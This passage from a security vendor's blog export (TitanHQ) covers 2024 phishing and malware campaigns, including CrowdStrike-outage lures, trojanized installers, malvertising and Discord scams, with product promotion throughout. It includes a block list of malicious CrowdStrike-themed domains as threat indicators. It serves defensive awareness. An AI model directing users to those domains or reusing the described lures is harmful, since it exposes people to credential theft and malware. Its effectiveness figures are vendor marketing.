phishing campaigns.\r\nSecurity awareness training programs train employees to look for signs of phishing and other malicious\r\ncommunications, and they are often heavily focused on embedded links in emails and attachments. Emails such as\r\nthis and callback phishing attempts lack the standard malicious content and as such, end users may not identify\r\nthem as phishing attempts. It is important to incorporate phishing emails such as this in security awareness\r\ntraining programs to raise awareness of the threat.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 69 of 136\n\nThat is easy with SafeTitan from TitanHQ, as is conducting phishing simulations with these atypical message\r\nformats. SafeTitan includes a huge library of security awareness training content, and the phishing simulator\r\nincludes thousands of phishing templates from real-world phishing attempts. It is easy for businesses to create and\r\nautomate comprehensive security awareness training programs for the workforce and provide training on how to\r\nidentify novel techniques such as this when they are identified, to ensure employees are kept up to date on the\r\nlatest tactics, techniques, and procedures used by cybercriminals.\r\nCrowdStrike Phishing and Malware Distribution Scams Mount Following Outage\r\nby G Hunt | July 26, 2024 | Phishing \u0026 Email Spam\r\nCrowdStrike has confirmed that a significant proportion of Windows devices that were rendered inoperable\r\nfollowing a faulty update last Friday have now been restored to full functionality; however, businesses are still\r\nfacing disruption and many scams have been identified by cybercriminals looking to take advantage.\r\nOne of those scams involves a fake recovery manual that is being pushed in phishing emails. The emails claim to\r\nprovide a Recovery Tool that fixes the out-of-bounds memory read triggered by the update that caused Windows\r\ndevices to crash and display the blue screen of death. The phishing emails include a document attachment named\r\n“New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows. docm.” The document is a copy\r\nof a Microsoft support bulletin, which claims that a new Microsoft Recovery Tool has been developed that\r\nautomates recovery by deleting the CrowdStrike driver that is causing the crash. The user is prompted to enable\r\ncontent; however, doing so will allow a macro to run, which will download a malicious DLL, which launches the\r\nDaolpu stealer – an information stealer that collects and exfiltrates credentials, login information, and cookies\r\nstored in Chrome and Firefox.\r\nAnother campaign has been identified that capitalizes on the defective Falcon Sensor update. The spear phishing\r\ncampaign targeted German firms and attempts to distribute a fake CrowdStrike Crash Reporter installer via a\r\nwebsite that spoofs a legitimate German company. The website was registered a day after the CrowdStrike\r\ndisruptions started. If the user attempts to download the installer by clicking the download button in the email, a\r\nZIP archive will be delivered that includes a malicious InnoSetup installer. If executed, the user is shown a fake\r\nCrowdStrike branded installer. The installer is password-protected to prevent analysis and the final payload could\r\nnot be determined.\r\nAnother campaign attempts to distribute Lumma information-stealing malware. The campaign uses the domain,\r\ncrowdstrike-office365[.]com, and tricks the recipient into downloading a fake recovery tool to deal with the boot\r\nloop that prevents Windows devices from booting up. If the downloaded file is executed, it delivers a malware\r\nloader, which will, in turn, deliver the Lumma infostealer.\r\nThese are just three campaigns that use the CrowdStrike outage to deliver malware, all of which use email as the\r\nway to make contact with individuals affected by the outage. Many other campaigns are being conducted and a\r\nlarge number of CrowdStrike-themed domains have been registered since the problems started. Other malicious\r\ndomains used in campaigns include the following, all of which should be blocked.\r\ncrowdstrike-helpdesk.com\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 70 of 136\n\ncrowdstrike.black\r\ncrowdstrikefix.zip\r\ncrowdstrikebluescreen.com\r\ncrashstrike.com\r\nfix-crowdstrike-bsod.com\r\ncrowdstrike-falcon.online\r\ncrowdstrike-bsod.com\r\ncrowdstrikedoomsday.com\r\ncrowdstrikedown.site\r\ncrowdstrikefix.com\r\nisitcrowdstrike.com\r\ncrowdstriketoken.com\r\ncrowdstrike0day.com\r\ncrowdstrikeoutage.com\r\nThese scams are likely to continue for some time, so it is important to remind employees of the high risk of\r\nmalicious emails and warn them to exercise extreme caution with any emails received. Employees should be told\r\nto report any suspicious emails to their security team.\r\nTitanHQ offers a range of cybersecurity solutions to block phishing and malware distribution campaigns, all of\r\nwhich are quick and easy to implement and can protect you in a matter of minutes. They include the WebTitan\r\nweb filter for blocking access to known malicious websites, such as those detailed in this email; the PhishTitan\r\nanti-phishing solution for Office 365, and the SpamTitan corporate email filter for blocking phishing emails. The\r\nlatter incorporates email sandboxing for blocking novel and obfuscated malware threats. TitanHQ also provides a\r\ncomprehensive security awareness training platform and phishing simulator for improving your human defenses\r\nby raising awareness of cyber threats and providing timely training content on the latest tactics used by\r\ncybercriminals in targeted attacks on employees.\r\nGive the TitanHQ team a call today for further information on improving your defenses, or take advantage of the\r\nfree trial available with all TitanHQ products to get immediate protection.\r\nSurge in Fake Websites and Phishing Related to CrowdStrike Windows Outage\r\nby G Hunt | July 22, 2024 | Phishing \u0026 Email Spam\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 71 of 136\n\nOn July 19, 2024, Windows workstations and servers were disabled as a result of a bug in a software update for\r\nCrowdStrike Falcon Sensor. When the update was installed on Windows devices, it caused them to show the Blue\r\nScreen of Death or get stuck in a boot loop, rendering the devices unusable. Microsoft revealed that its telemetry\r\nshowed 8.5 million Windows devices had been affected in around 78 minutes.\r\nCrowdStrike Falcon platform is a cybersecurity solution that incorporates anti-virus protection, endpoint detection\r\nand response, threat intelligence, threat hunting, and security hygiene, and it is used by many large businesses\r\naround the world, including around half of Fortune 500 firms. The disruption caused by the update has been\r\ncolossal. Airlines had to ground flights, airports were unable to check people in, healthcare providers were unable\r\nto access electronic patient records and had to cancel appointments and surgeries, financial institutions faced\r\nmajor disruption, and some media companies were unable to broadcast live television for hours. Even\r\norganizations that did not use the Falcon product were adversely affected if any of their vendors used the product.\r\nThe incident has been called the worst-ever IT outage, with huge financial implications.\r\nIt did not take long for cybercriminals to take advantage of the chaos. Within hours, cybercriminals were\r\nregistering fake websites impersonating CrowdStrike offering help fixing the problem, and domains were\r\nregistered and used in phishing campaigns promising a rapid resolution of the problem. Given the huge financial\r\nimpact of suddenly not having access to any Windows devices, there was a pressing need to get a rapid resolution\r\nbut the fixes being touted by cybercriminals involved downloading fake updates and hotfixes that installed\r\nmalware.\r\nThose fake updates are being used to deliver a range of different malware types including malware loaders, remote\r\naccess Trojans, data wipers, and information stealers, while the phishing campaigns direct users to websites where\r\nthey are prompted to enter their credentials, which are captured and used to access accounts. Cybercriminals have\r\nbeen posing as tech specialists and independent researchers and have been using deepfake videos and voice calls\r\nto get users to unwittingly grant them access to their devices, disclose their passwords, or divulge other sensitive\r\ncodes.\r\nCrowdStrike has issued a fix and provided instructions for resolving the issue, but those instructions require each\r\naffected device to be manually fixed. The fix was rolled out rapidly, but CrowdStrike CEO George Kurtz said it\r\nwill likely take some time for a full recovery for all affected users, creating a sizeable window of opportunity for\r\nthreat actors. Due to the surge in criminal activity related to the outage, everyone should remain vigilant and\r\nverify the authenticity of any communications, including emails, text messages, and telephone calls, and only rely\r\non trusted sources for guidance.  The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has reminded\r\nall organizations of the importance of having robust cybersecurity measures in place to protect their users, assets,\r\nand data, and to remind all employees to avoid opening suspicious emails or clicking on unverified links in\r\nemails.\r\nIt is important to have multiple layers of security protection to identify, detect, and avoid these attacks, including\r\nAI-driven phishing protection, web filtering to block access to malicious websites, anti-virus software to detect\r\nand neutralize malware, and security awareness training for employees. TitanHQ can help to secure your business\r\nin all of these areas and offers a cloud-based spam filtering service (SpamTitan) which includes email sandboxing\r\nand email antivirus filter, phishing protection for Office 365 (PhishTitan), and the SafeTitan security awareness\r\ntraining and phishing simulator.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 72 of 136\n\nMalicious Email Campaign Deliver a Malware Cluster Bomb of Up to 10 Viruses\r\nby G Hunt | June 30, 2024 | Phishing \u0026 Email Spam\r\nMany malware infections start with a malicious email that contains a file attachment with a malicious script that\r\ndownloads malware if executed. One response to a single email is all it takes to infect the user’s device with\r\nmalware, which may be able to spread across the network or at least provide the threat actor with the foothold they\r\nneed in the network for follow-on activities. There is a much worse scenario, however. Rather than a single user\r\ninfecting the network with one malware variant, that single response to the malicious email results in multiple\r\nmalware infections. One campaign has been identified that does just that. A malware cluster bomb is delivered that\r\ncan infect the user’s device with up to 10 different malware variants.\r\nThe campaign was identified by researchers at KrakenLabs and has been attributed to a threat actor known as\r\nUnfurling Hemlock. The campaign is being conducted globally with at least 10 countries known to have been\r\nattacked, although most of the victims have so far been located in the United States. The campaign has been\r\nrunning since at least February 2024 and uses two methods to deliver the malware variants – malicious emails and\r\nmalware loaders installed by other threat groups. The threat actor has already distributed hundreds of thousands of\r\nmalicious files in the 5 months since the operation is believed to have commenced.\r\nIn the email campaign conducted by Unfurling Hemlock, the victim is tricked into downloading a file called\r\nWExtract.exe which contains nested cabinet files, each containing a different malware variant. If the file is\r\nexecuted, the malware is extracted in sequence, and each malware variant is executed in reverse order, starting\r\nwith the last malware variant to be extracted. Each malware cluster bomb has between four and seven stages, with\r\nsome of those stages delivering multiple malware variants.\r\nThe malware variants delivered vary but they consist of information stealers, backdoors, malware loaders, and\r\nbotnets. Information stealers include Redline Stealer, Mystic Stealer, and RisePro, and malware loaders including\r\nAmadey and SmokeLoader. Other malware variants are used to disable security solutions such as Windows\r\nDefender, help with obfuscation and hiding malware payloads, gathering system information, and reporting on the\r\nstatus of the malware infections.\r\nIt is not clear how the threat actor is using these malware infections. They could be delivering malware for other\r\nthreat actors and selling the access, using the malware to harvest credentials to sell on the darkweb, conducting\r\ntheir own attacks using whatever malware variant serves their purpose, or a combination of the three. What the\r\nattack does ensure is maximum flexibility, as there are high levels of redundancy to ensure that if some of the\r\nmalware variants are detected, some are likely to remain.\r\nThe delivery of multiple malware variants means this campaign could be highly damaging, but it also increases\r\nthe chance of detection. While antivirus software is a must and may detect some of the malware variants, others\r\nare likely to go undetected. The key to blocking attacks is to prevent the initial phishing emails from reaching end\r\nusers and to provide training to the workforce to help with the identification and avoidance of these malicious\r\nemails.\r\nMany email security solutions rely on antivirus engines to detect malware but cybercriminals are skilled at\r\nbypassing these signature-based defenses. TitanHQ’s SpamTitan anti-spam software, SpamTitan, uses dual\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 73 of 136\n\nantivirus engines as part of the initial checks but also email sandboxing for behavioral analysis. Suspicious emails\r\nare sent to the sandbox where files are unpacked and their behavior is analyzed in depth. The behavioral analysis\r\nidentifies malicious actions, resulting in the messages being quarantined for further analysis by the security team.\r\nSpamTitan also includes AI and machine-learning algorithms to check how messages deviate from the emails\r\ntypically received and can identify new threats that have previously not been seen. SpamTitan is a highly effective\r\nMicrosoft 365 spam filter and can be provided as a gateway spam filter or a cloud-based anti-spam service.\r\nEnd user training is an important extra layer of security that helps eradicate bad security practices and teaches\r\nemployees how to recognize and avoid malicious emails. Should a malicious bypass email security defenses,\r\ntrained employees will be more likely to recognize and report the threat to the security team. Training data from\r\nSafeTitan, TitanHQ’s security awareness training platform and phishing simulator, shows the training and\r\nphishing simulations can reduce susceptibility to email attacks by up to 80% when provided regularly throughout\r\nthe year.\r\nGive the TitanHQ sales team a call today for more information on these and other cybersecurity solutions to\r\nimprove your defenses against the full range of cyber threats.\r\nA Cost-Effective Way to Improve Office 365 Email Filtering\r\nby G Hunt | June 29, 2024 | Phishing \u0026 Email Spam, Spam Advice\r\nAround 40% of businesses use Office 365 for email, which includes Exchange Online Protection (EOP) with\r\nstandard licenses for blocking spam and other email threats. While EOP will block a substantial amount of\r\nunwanted spam emails and malicious emails, the level of protection provided falls well below what many\r\nbusinesses need as too many threats pass through undetected.\r\nBusinesses can opt for a more expensive Business Premium license to improve Microsoft’s spam filter for Office\r\n365, as this license includes Defender for Office 365. Alternatively, businesses can pay for Defender as an add-on.\r\nWhile Defender improves the phishing detection rate, this security feature only adds a little extra protection to\r\nEOP, and many malicious emails still go undetected. The E5 license provides the greatest amount of protection but\r\nit is prohibitively expensive for many businesses, and even this license does not give you cutting-edge protection.\r\nFortunately, there is a way to improve Office 365 email filtering that will provide you with excellent protection\r\nagainst phishing, malware, spam, and other email threats without having to cover the cost of expensive licenses\r\nand add-ons. That solution is to use a third-party email security solution that augments the spam filter for Office\r\n365 regardless of the license you have. Many businesses prefer to use a third-party solution rather than placing all\r\nof their trust in Microsoft – a company that has recently struggled with preventing hackers from compromising its\r\nown systems.\r\nSpamTitan from TitanHQ is a cloud-based email security solution that integrates seamlessly with Office 365 to\r\ngreatly increase protection against email threats such as phishing, business email compromise, malware, and data\r\ntheft by insiders, and is easy to set up, configure, and manage.\r\nThere are several features of SpamTitan that are lacking in Microsoft’s security solutions. In addition to\r\nperforming reputation checks and blocking known malicious email addresses and domains, SpamTitan uses\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 74 of 136\n\npredictive techniques for detecting spam and phishing emails, such as Bayesian analysis, machine learning, and\r\nheuristics. These features allow SpamTitan to detect and block zero-day phishing threats and business email\r\ncompromise, which Microsoft struggles to detect and block.\r\nSpamTitan performs extensive checks of embedded hyperlinks to combat phishing, including checks of Shortened\r\nURLs.  Office 365 malware detection is greatly improved with dual antivirus engines for detecting known\r\nmalware and email sandboxing. The sandboxing feature includes machine learning and behavioral analysis for the\r\nsafe detonation of files in an isolated environment, and message sandboxing is vital for detecting and blocking the\r\nzero-day malware threats that EOP and Defender miss.\r\nSpamTitan cloud-based email filtering is also an ideal choice for Managed Services Providers looking to provide\r\ntheir customers with more advanced email security, especially for small- and medium-sized clients unwilling to\r\npay for E5 licenses. SpamTitan has been developed from the ground up to meet the needs of MSPs and manage\r\nemail security with minimal management overhead.\r\nTitanHQ can also MSPs additional protection against phishing with TitanHQ’s new anti-phishing solution,\r\nPhishTitan. PhishTitan uses a large language model (LLM) and AI to analyze emails to identify phishing attempts.\r\nThe solution incorporates multiple curated feeds to detect malicious URLs linked in phishing emails, adds banners\r\nto emails from external sources to warn end users about potential threats, and adds post-delivery remediation\r\nacross multiple tenants allowing phishing emails to be instantly removed from the email system with a single\r\nclick.\r\nThe best way to find out more about the full capabilities of SpamTitan and PhishTitan and how they work is to\r\ncall the TitanHQ team. A product demonstration can be arranged and you can take advantage of a free trial to see\r\nfor yourself the difference these solutions make and how they can significantly improve threat detection with\r\nOffice 365.\r\nNew Campaigns Use Trojanized Software Downloaders to Distribute Dangerous\r\nInformation Stealers\r\nby G Hunt | June 28, 2024 | Phishing \u0026 Email Spam\r\nTwo new malware distribution campaigns have been detected that deliver dangerous information-stealing\r\nmalware, both targeting individuals looking to download free and pirated software.\r\nTrojaninized Cisco Webex Meetings App Delivers Malware Loader and\r\nInformation Stealer\r\nAnother malware distribution campaign has been identified that is using trojanized installers for free and pirated\r\nsoftware to deploy a malware loader called Hijack Loader, which in turn delivers an information stealer. In the\r\nattacks, the victim was tricked into downloading a trojanized version of the Cisco Webex Meetings App, a video\r\nstreaming app. The user downloaded a password-protected archive (RAR) file, which contained a file called\r\nsetup.exe. When the victim executed the file, DLL sideloading was used to launch the HijackLoader, which was\r\ninjected into a Windows binary.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 75 of 136\n\nHijackLoader connects with its command-and-control server and downloads another binary, an information stealer\r\ncalled Vidar Stealer. The malware bypasses User Account Control (UAC), escalates privileges, and adds an\r\nexception to the Windows Defender exclusion list. Vidar Stealer is used to steal credentials from browsers and\r\ndeliver additional malware payloads, including a cryptocurrency miner. This campaign primarily targets\r\norganizations in Latin America and the Asia Pacific region.\r\nGoogle Ads Used to Target Mac Users and Deliver Poseidon Malware\r\nAn information stealer called Poseidon is being distributed via malicious Google Ads that claim to provide the\r\npopular Arc web browser. The campaign targets Mac users and delivers a trojanized version of the Arc browser\r\ninstaller. If the installer is launched, the user gets the browser but is also infected with the malware.\r\nAccording to an analysis from Malwarebytes, the new information stealer has similar features to the notorious\r\nAtomic Stealer, including a file grabber, crypto wallet extractor, and the ability to steal passwords from password\r\nmanagers such as Bitwarden and KeepassXC, passwords stored in browsers, and browser histories. The targeting\r\nof password managers makes this malware particularly dangerous, potentially allowing the theft of all passwords.\r\nThe researchers believe the malware has been set up as a rival to Atomic Stealer\r\nHow to Protect Your Business\r\nProtecting against malware requires a defense-in-depth approach to security, where several different security\r\nsolutions provide multiple overlapping layers of protection. These security measures should include the following:\r\nAntivirus software – Antivirus software is a must. The software will be able to detect malware when it is\r\ndownloaded onto a device or is executed. The malware is identified by its signature, which means that a particular\r\nmalware variant must be known and its signature must be present in the malware definition list used by that\r\nsoftware. Antivirus software will not detect novel malware variants without behavioral analysis of files.\r\nWeb filter – One of the best defenses against malware distributed via the internet is a web filter. The web filter\r\nblocks downloads of malicious files by preventing downloads of executable files from the Internet, blocking\r\naccess to known malicious websites, and limiting the sites that users can visit on their corporate-owned devices.\r\nThe main advantage of a web filter is the threat is dealt with before any files are downloaded from the Internet.\r\nSecurity awareness training – Users should be warned about the risks of downloading software from the\r\nInternet, be taught how to identify the signs of phishing and malicious emails, and be trained on security best\r\npractices. The latter should include carefully checking the domain of the website offering software and making\r\nsure it is the official website of the software vendor or a reputable software distributor.\r\nEmail security solution – Malware is often delivered via email, usually via a malicious script in an attached file\r\nor via a linked web page. An email security solution needs to have antivirus capabilities – signature-based\r\ndetection and behavioral analysis in an email sandbox. The former will detect known malware variants and email\r\nsandboxing is used to detect novel malware variants.  Your email security solutions should also include AI-based\r\ndetection, which can identify malicious messages based on how they differ from standard messages received by\r\nyour business and perform comparisons with previous malware distribution campaigns.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 76 of 136\n\nWhile TitanHQ does not provide antivirus software, TitanHQ can help with web filtering (WebTitan), email\r\nsecurity (SpamTitan), phishing protection (PhishTitan), and security awareness training (SafeTitan). For more\r\ninformation on improving your defenses against malware and TitanHQ’s multi-award-winning cloud-based email\r\nsecurity and internet security solutions for businesses and managed service providers, give the TitanHQ team a\r\ncall today.\r\nOyster Backdoor Delivered Through Malvertising Campaign Offering Popular\r\nSoftware Solutions\r\nby G Hunt | June 26, 2024 | Website Filtering\r\nA malvertising campaign has been identified that targets users looking to download popular software such as\r\nGoogle Chrome and Microsoft Teams and delivers a backdoor malware called Oyster. The threat actor has\r\nregistered lookalike domains that offer the software to download; however, the installer delivers the backdoor,\r\nwith PowerShell used for persistence. After the malware is executed, the legitimate software is installed. Since the\r\nuser gets the software they are expecting, they are unlikely to realize that their device has been infected.\r\nThe Oyster backdoor has been linked to the Russian threat group behind the infamous TrickBot Trojan. Once\r\ninstalled, the malware connects with its command-and-control server, gathers information about the host, and\r\nallows the threat actors to remotely execute code on the infected device.  According to researchers at Rapid7 who\r\nidentified the campaign, the threat actor has been observed delivering additional malware payloads on infected\r\ndevices.\r\nMalvertising is a common method of malware delivery that takes advantage of a lack of security awareness and\r\nattentiveness. Threat actors create adverts on legitimate ad networks for popular software solutions and pay to\r\nhave their ads appear when users search for the software solutions they are impersonating. Just because an advert\r\nappears at the top of the search engine listings on Google or Bing it does not mean that the advert is legitimate.\r\nClicking the link will direct the user to a site that is a carbon copy of the legitimate website that it spoofs, where\r\nthey can download the software installer. These campaigns can be identified by the domain, which should be\r\ncarefully checked to make sure it is the website of the official software provider.\r\nTyposquatting is also commonly used, where threat actors register almost identical domains to the company they\r\nare impersonating. The domains usually have a transposed or missing letter. If the domain is not carefully\r\nchecked, the user is unlikely to realize they are not on the official website. Threat actors use black hat search\r\nengine optimization techniques to get the websites to appear high up in the search engine listings.\r\nBy targeting software downloads, where the user is expecting to download an installer, the threat actor does not\r\nneed to convince the user to execute the malicious file. If they fail to identify the scam before downloading the\r\ninstaller, their device is highly likely to be infected. Security awareness training should cover the methods used by\r\nthreat actors to distribute malware over the Internet and should condition employees to always carefully check the\r\ndomain to make sure it is the legitimate vendor’s website. Rather than develop a security awareness training\r\nprogram from scratch, businesses should consider using a vendor that can provide a comprehensive training\r\nplatform that is constantly updated with new training content covering new attack methods and scams. A security\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 77 of 136\n\nawareness training program should run continuously, to build awareness, teach security best practices, and ensure\r\nthat employees are constantly reminded of the importance of security.\r\nIn addition to training, technical measures should be implemented. A web filter should be used to prevent access\r\nto known malicious web pages and block downloads of executable files from the Internet, with policies\r\nimplemented that require any software to be provided through or by the IT team. TitanHQ can help to improve\r\nyour defenses against malware with a suite of cybersecurity solutions, including the SafeTitan security awareness\r\ntraining and phishing simulation platform, the WebTitan web filter to prevent access to malicious websites,\r\nSpamTitan email security with sandboxing to block malicious emails, and PhishTitan to improve phishing\r\ndetection and mediation for businesses that use Microsoft 365.\r\nFor more information about these and other cybersecurity solutions from TitanHQ, give the sales team a call. All\r\nTitanHQ SaaS solutions are available on a free trial to allow you to test them in your own environment before\r\nmaking a purchase decision, with customer support provided throughout the trial.\r\nDevastating Healthcare Cyberattack Started with a Malicious File Download from\r\nthe Internet\r\nby G Hunt | June 19, 2024 | Internet Security\r\nAscension, one of the largest private healthcare systems in the United States, fell victim to a ransomware attack on\r\nMay 8, 2024, that forced systems offline, including patients’ medical records which were not fully restored for a\r\nmonth. The attack caused massive disruption, and without access to electronic health records, staff were forced to\r\nrecord patient information manually.\r\nPatient care was seriously affected, with delays in diagnosis and treatment, and the lack of access to medical\r\nrecords resulted in medical errors. Without technology to perform routine safety checks, patient safety was put at\r\nrisk. The investigation into the attack is still ongoing, but evidence has already been found that files containing\r\nsensitive data were stolen in the attack. The scale of the data breach has yet to be determined but for a healthcare\r\nsystem as large as Ascension, the breach could be considerable.\r\nThe ransomware attack occurred as a result of a simple error by a single employee, who was tricked into\r\ndownloading a malicious file from the internet. That file provided the attackers with a foothold in the network,\r\nfrom where they were able to launch a devastating ransomware attack. Ascension said it has no reason to believe\r\nthat the file download was a malicious act and is satisfied that it was an honest mistake by the employee. Sadly, it\r\nis the type of mistake that frequently results in ransomware attacks and costly data breaches.\r\nAscension has not disclosed how the file was downloaded, whether it was from general web browsing,\r\nmalvertising that directed the employee to a malicious website, or if they clicked a link in a phishing email.\r\nRegardless of how the employee arrived at the malicious site, the attack could have been prevented with the right\r\ntechnology in place. It is possible to protect against all of the above-mentioned methods of malware delivery with\r\na web filter. WebTitan from TitanHQ is a DNS-based web filter for businesses to prevent employees from visiting\r\nwebsites hosting malware and to block the web-based component of phishing attacks.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 78 of 136\n\nWebTitan is fed threat intelligence to provide real-time protection against malicious websites. As soon as a\r\nmalicious website is detected, it is added to the database and all WebTitan users are prevented from visiting that\r\nURL. WebTitan categorizes and blocks around 60,000 malware and spyware domains each day and if an attempt\r\nis made to visit one of those URLs, whether it is via a link in an email, malvertising, or general web browsing, the\r\nattempt is blocked and the user is directed to a locally hosted block page.\r\nWebTitan is updated constantly with vast click stream traffic from actively visited URLs from 500 million end\r\nusers, and the data is used to categorize websites. WebTitan users can then place restrictions on 53 categories of\r\nwebsites that employees can visit on their work devices, eliminating risks from common sources of malware such\r\nas torrent and file-sharing sites for which there is no business reason for access. Further, as an additional\r\nprotection against malware, WebTitan can be configured to block downloads of certain file types from the internet,\r\nsuch as executable files that are commonly used to deliver malware. For the majority of employees, there is rarely\r\na business need to download executable files.\r\nMalware is commonly delivered via email, either via attachments containing malicious scripts and macros or via\r\nembedded hyperlinks. It is important to have an advanced email security solution in place to block this method of\r\nmalware delivery. SpamTitan is a cloud-based anti-spam service that protects against known malware using twin\r\nantivirus engines that scan attachments for the signatures of malware. To protect against novel malware threats,\r\nSpamTitan incorporates a Bitdefender-powered email sandbox, where suspicious messages are sent for deep\r\ninspection. An email sandbox is key to blocking malware threats and essential due to the volume of novel malware\r\nvariants now being distributed.\r\nWhile technological solutions are essential, it is also important to provide security awareness training to the\r\nworkforce to improve awareness of cyber threats and teach security best practices. This is another area where\r\nTitanHQ can help. SafeTitan is a comprehensive security awareness training platform and phishing simulator that\r\nis proven to reduce susceptibility to phishing attacks that helps businesses develop a human firewall and combat\r\nthe many threats that target employees.\r\nFor more information on improving your defenses against malware and phishing threats, give the TitanHQ team a\r\ncall. All TitanHQ cybersecurity solutions are also available on a free trial to allow you to put them to the test\r\nbefore making a purchase decision.\r\nTorrent Sites Used to Deliver Dangerous Malware Packaged with Pirated Software\r\nby G Hunt | May 31, 2024 | Internet Security\r\nDownloading unofficial and pirated software from the Internet carries a significant risk of malware infections.\r\nMalware is often packaged with the installers or with the cracks/key generators that provide the serial keys or\r\ncodes to activate the software.\r\nCybercriminals use a variety of methods for driving traffic to their malicious websites, including malicious\r\nGoogle Ads, adverts on other third-party ad networks, SEO poising to get their malicious sites appearing high in\r\nthe search engine listings, and via torrent and warez sites. A warning has recently been issued about the latter by\r\nAhnLab Security Intelligence Center (ASEC).\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 79 of 136\n\nThe campaign identified by the researchers distributes Microsoft Office, Microsoft Windows, and the Hangul\r\nWord Processor. The pirated software is available through torrent sites and includes a professional-looking\r\ninstaller. The installer for Microsoft Office allows users to select the Office products they want to install in either\r\nthe 32-bit or 64-bit version and select the language.\r\nIf the installer is run, the user will get the software they are looking for; however, in the background, a malware\r\ncocktail will be installed. The threat actor behind this campaign is distributing several different malware payloads,\r\nincluding coinminers, remote access trojans (RATs), downloaders, and anti-AV malware.\r\nWhen the installer is run, an obfuscated .NET downloader is executed which connects to the attacker’s\r\nTelegram/Mastadon channels and obtains a Google Drive or GitHub URL from where Base64 encrypted strings\r\nare obtained. Those strings are decrypted on the device and are PowerShell commands. Task Scheduler is used to\r\nexecute the PowerShell commands, which install the malware. The scheduled tasks also allow the threat actor to\r\nconsistently install other malware variants on the infected device.\r\nBy using Task Scheduler, the threat actor can reinstall malware if it is detected and removed, and since an updater\r\nis installed, the PowerShell commands can change. Even if the initial URLs are blocked, others will be added to\r\nensure malware can still be delivered.\r\nInitially, the threat actor was installing the updater together with either the Orcus RAT or the XMRig\r\ncryptocurrency miner. Orcus RAT provides the threat actor with remote control of an infected device, and has\r\nkeylogging capabilities, can take screenshots, access the webcam, and exfiltrate data. XMRig is configured to only\r\nrun when it is unlikely to be detected and will quit when system resource usage is high.\r\nIn the latest campaign, the threat actor also installs 3Proxy, which allows abuse of the infected device as a proxy,\r\nPureCrypter for downloading and executing additional malware payloads, and AntiAV malware, which disables\r\nantivirus and other security software by modifying the configuration files.\r\nWhile this campaign appears to be targeting users in South Korea, it clearly shows the risks of downloading\r\npirated software. Due to the inclusion of the updater and the installation of PureCrypter, remediation is difficult.\r\nFurther, new malware variants are being distributed every week to evade detection.\r\nEmployees often download software to make it easier for them to do their jobs, and Torrent sites are a common\r\nsource of unauthorized software. Businesses should therefore implement policies that prohibit employees from\r\ndownloading software that has not been authorized by the IT department and should also implement controls to\r\nprevent Torrent and other software distribution sites from being accessed.\r\nWith TitanHQ’s WebTitan DNS filter, blocking access to malicious and risky websites could not be simpler.\r\nSimply install the cloud-based web filter and configure the solution by using the checkboxes in the user interface\r\nto block access to these categories of websites. WebTitan is constantly updated with the latest threat intelligence to\r\nblock access to known malicious websites, and it is also possible to block downloads of executable files from the\r\nInternet.\r\nFor more information on improving Internet security with a DNS-based web filter, give the TitanHQ team a call.\r\nWebTitan, like all other TitanHQ products, is available on a free trial, with product support provided to ensure you\r\nget the most out of the solution during the trial.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 80 of 136\n\nDiscord Phishing Risk Increases with 50,000+ Malicious Links Detected in 6\r\nMonths\r\nby G Hunt | May 30, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nPhishing tactics are constantly changing and while email is still one of the most common ways of getting\r\nmalicious content in front of end users, other forms of phishing are growing. Smishing (SMS phishing) has\r\nincreased considerably in recent years, and vishing (voice phishing) is also common, especially for IT support\r\nscams.\r\nAnother method of malware delivery that has seen an enormous increase recently is the use of instant messaging\r\nand VoIP social platform Discord. Discord is a platform that has long been popular with gamers, due to being able\r\nto create a server with voice and text for no extra cost, both of which are necessary for teamspeak in gaming.\r\nWhile gamers still account for a majority of users, usage for non-gaming purposes is growing.\r\nThe platform is also proving popular with cybercriminals who are using it for phishing campaigns and malware\r\ndistribution. According to Bitdefender, the antivirus company whose technology powers the SpamTitan email\r\nsandboxing feature, more than 50,000 malicious links have been detected on Discord in the past 6 months. Around\r\na year ago, a campaign was detected that used Discord to send links to a malicious site resulting in the delivery of\r\nPureCrypter malware – a fully featured malware loader that is used for distributing information stealers and\r\nremote access trojans.\r\nDiscord responded to the misuse of the platform and implemented changes such as adding a 24-hour expiry for\r\nlinks to internally hosted files, which made it harder for malicious actors to use the platform for hosting malware.\r\nWhile this move has hampered cybercriminals, the platform is still being used for malware distribution. One of the\r\nlatest malicious Discord campaigns is concerned with obtaining credentials and financial information rather than\r\ndistributing malware.\r\nThe campaign involves sending links that offer users a free Discord Nitro subscription. Discord Nitro provides\r\nusers with perks that are locked for other users, such as being able to use custom emojis anywhere, set custom\r\nvideo backgrounds, HD video streaming, bigger file uploads, and more. Discord Nitro costs $9.99 a month, so a\r\nfree account is attractive.\r\nIf the user clicks the link in the message, they are directed to a fake Discord website where they are tricked into\r\ndisclosing credentials and financial information. Other Discord Nitro lures have also been detected along the same\r\ntheme, offering advice on how to qualify for a free Discord Nitro subscription by linking to other accounts such as\r\nSteam. According to Bitdefender, 28% of detected malicious uses are spam threats, 27% are untrusted, around\r\n20% are phishing attempts and a similar percentage involve malware distribution.\r\nAny platform that allows direct communication with users can be used for phishing and other malicious purposes.\r\nSecurity awareness training should cover all of these attack vectors and should get the message across to end 